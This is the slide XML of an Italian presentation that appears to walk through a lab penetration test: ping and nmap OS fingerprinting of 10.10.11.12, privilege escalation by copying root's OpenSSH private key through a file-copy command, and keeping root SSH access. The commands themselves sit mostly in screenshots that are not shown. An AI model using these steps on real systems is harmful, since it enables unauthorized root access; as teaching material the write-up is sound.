                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>” che è un comando che può essere molto utile in quanto possiamo andare ad effettuare copie di file di cui normalmente non dovremmo essere in possesso, come delle informazioni personali. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Avuta questa intuizione non ci basta che creare un file vuoto in cui verrà copiata la chiave </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OpenSHH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> di root, salvarla in locale e connetterci. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C746812F-6B7C-3A7F-7535-96C6B65BB9EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3035604"/>
            <a:ext cx="5411775" cy="2949417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396145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8" name="Group 167">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9" name="Straight Connector 168">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01" name="Right Triangle 200">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0"/>
            <a:ext cx="3428812" cy="5436630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Escalation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:ea typeface="+mj-lt"/>
              <a:cs typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="16" name="Segnaposto contenuto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99998F06-5BBF-2447-0CD1-A4682314ACBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1991656864"/>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5588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47947" y="725951"/>
            <a:ext cx="4947868" cy="1442463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Escalation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:ea typeface="+mj-lt"/>
              <a:cs typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6B4B422-60D0-42A3-239C-8A73C123C20B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533058" y="3435740"/>
            <a:ext cx="5019495" cy="3055368"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01106F77-6212-8585-1468-C3FF9FB52D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5857806" y="0"/>
            <a:ext cx="6198577" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="898655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6" name="Group 15">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7" name="Right Triangle 48">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91079" y="725952"/>
            <a:ext cx="4038652" cy="1881178"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Escalation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:ea typeface="+mj-lt"/>
              <a:cs typeface="+mj-lt"/>
            </a:endParaRPr>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91079" y="2886117"/>
            <a:ext cx="4038652" cy="3276824"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ed ecco così ottenuta la chiave di root per un collegamento </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Salviamo la chiave in privato e colleghiamoci. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C74CDB5-399A-6AEC-6837-F3C721A03459}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="859793"/>
            <a:ext cx="6401443" cy="5153161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211628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1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15">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17">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8">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84223" y="721946"/>
            <a:ext cx="10611627" cy="1990906"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Maintaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> access </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Segnaposto contenuto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F550568A-4416-391F-0738-9854D6D3A3E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6577738" y="2893475"/>
            <a:ext cx="4425911" cy="3242577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Per l’ultima fare di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>maintaing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> access è stato pensato di utilizzare una strategia di tunnelling come SSH e collegarci al server come root ogni volta che o si desidera. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Riportiamo cioè quello visto poco prima. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93ACD115-F274-878E-4C92-5BB5F552AA48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="816824" y="2884572"/>
            <a:ext cx="5308541" cy="3251482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1295279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3" name="Straight Connector 82">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Right Triangle 114">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7" name="Rectangle 116">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9" name="Group 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{015ECF02-0C11-4320-A868-5EC7DD53D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0" name="Straight Connector 119">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C74A336-DE5D-4AE0-9A50-8D93C4AA4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11A81C9-7A36-4A04-B14C-A45B899E4B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AE1DE35-5349-4B57-B255-C07C69270C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AFE9588-5F4B-41DF-9FF6-6B4969245C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4CC9B87-707A-4D04-9336-B1418878A8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8CF5CAA-7C4D-408A-B1A8-E98C0E6633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62EA1B-90F8-4C08-AE36-FFBA2B45B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F7B5623-96F7-42F0-BAC5-78D6789E01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85D83B1-1723-4710-8FC5-18EDC879E4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998838C-DFB6-48F7-A18D-30469E8162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BDB9A78-94CB-422D-B92E-65FD2732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A5DBD01-426B-424D-815A-96518F6007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B0218DF-D55B-4D41-AE23-F1E64BAC60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8D61EB8-98CC-4243-9E20-33CAC65B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35F0944-B143-45B0-8B72-6CE34D4612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F68EF7F-67D0-463D-AB84-EA24D18196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E17074E-4E65-4CBD-B1B0-9C18D6F72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CC905ED-EF46-4349-9E9B-2174310948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B91F234-1C65-45AC-8CCE-A1C4AE49CE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D46B3DB-5DBB-41CF-9FA5-010ECA0C3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2A3FF8-F172-47ED-84C6-802C85C1C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5933982-9CB6-4199-B123-A3669A4FEF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CA832CD-B214-4ABC-AC95-A3DA116ACE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7EBA147-C4BA-4B48-B61D-CA24B8B06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A8253B7-461E-48CC-B871-8A255EE3D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ADE46C3-C2E1-4492-AC59-870160A3C8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B0052E9-B440-4C1E-BC41-39957D590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31F119B-638C-42B1-8400-709B94F1E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16299ED-D998-4895-9CCF-02427F195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4442675-84C9-45C8-9524-ABE4E2507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5BE3E63-4FA5-4EBD-9F3B-E29F5128A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5389E077-2E75-7E6D-D3EC-9A745313AC83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089726" y="722903"/>
            <a:ext cx="5415521" cy="2706098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Grazie per l'attenzione</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene cartone animato, vestiti, persona, Cartoni animati&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D253FB-3994-93BA-60E6-FF2155B5CBC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="5686" r="22816" b="2"/>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152" name="Right Triangle 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0753E91-DF19-4FA4-BFBF-221696B8D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56" y="-28737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586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8" name="Freeform: Shape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1517B3A5-1BB5-4C60-B65A-E4D6CA020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3">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ight Triangle 45">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245CBFEE-BAB2-7C88-87D4-EAA927E8EE27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684223" y="968990"/>
            <a:ext cx="10611627" cy="1651379"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Target Discovery </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC75931-799D-97D9-3F24-C30D76B1CF68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6577738" y="2893475"/>
            <a:ext cx="4914058" cy="3242577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" cap="all" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tramite il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> andiamo a verificare l’avvenuta connessione alla VPN e andiamo a rilevare se la macchina target è presenta all’interno della rete locale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" i="1">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0850219F-7EA2-F02F-AA5B-CF46088E3115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="691078" y="3624280"/>
            <a:ext cx="5412274" cy="1772065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3989494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Freeform: Shape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1517B3A5-1BB5-4C60-B65A-E4D6CA020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ight Triangle 45">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89" y="15123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AB588504-9AF3-4F6E-4485-FAA4E76E2FCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684223" y="968990"/>
            <a:ext cx="10611627" cy="1651379"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Target Discovery </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA05F747-851F-DAE4-19C6-BFFBAF57FB48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6577738" y="2893475"/>
            <a:ext cx="4914058" cy="3242577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" cap="all">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>NMAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Con il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> andiamo ad effettuare alcune scansioni al fine di ottenere l’OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fingerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> –O 10.10.11.12 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
